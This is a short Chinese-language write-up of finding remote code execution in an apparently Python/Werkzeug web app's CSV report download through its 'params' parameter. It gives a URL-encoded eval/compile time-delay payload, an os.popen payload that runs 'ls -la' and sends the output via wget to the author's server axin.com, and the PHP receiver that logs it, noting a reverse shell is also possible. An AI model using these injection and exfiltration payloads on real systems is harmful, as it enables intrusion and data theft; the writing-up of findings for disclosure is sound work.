如何解析曲折的RCE挖掘分析

简单记录一下这个漏洞，没啥特殊的手法，就是细心与fuzz

目标应用有一个下载文件的功能，你可以以csv格式下载报告

 

抓包结果如下：

 

看起来好像没啥问题，但是响应中的Werkzaug与python吸引了我的注意，不了解Werkzaug的可以去看一下

我尝试着用一些其他的payload替换了params参数的值，都是报错，看起来真就没啥问题，我都准备不看这个点了，但是，当我用空参数的时候，服务器返回了500错误

 

这说明这个参数还是会影响服务器的运行的嘛（当然也不一定，这里只是我的一个猜测），为了进一步确定，我开始fuzz这个参数

最后把各种报错整理了一下，发现所有和python相关的payload都报了500错误????

看起来有戏，于是把python rce的payload进行了一下url编码，

eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29

成功执行，服务器产生了延时：

 

由于数据不会回显，我们就只有用其他手法来外带数据了，还记得上一篇文章的内容吗？

没有看上一篇文章的快回头去瞅瞅????

构造payload:

eval(compile("""for x in range(1):\n import os\n os.popen(r'wget http://axin.com:8000/shell.php?cmd="$(ls -la)”)read()”””,’’,’single’))

然后在我们的服务器axin.com上部署一份shell.php文件，文件内容如下：

<?php
$a = fopen('POC.txt', 'a');
fwrite($a, $_GET["cmd"]);
fclose($a);
?>

发送payload,并查看POC.txt文件的内容：

 

nice的不得了，当然，也可以直接弹shell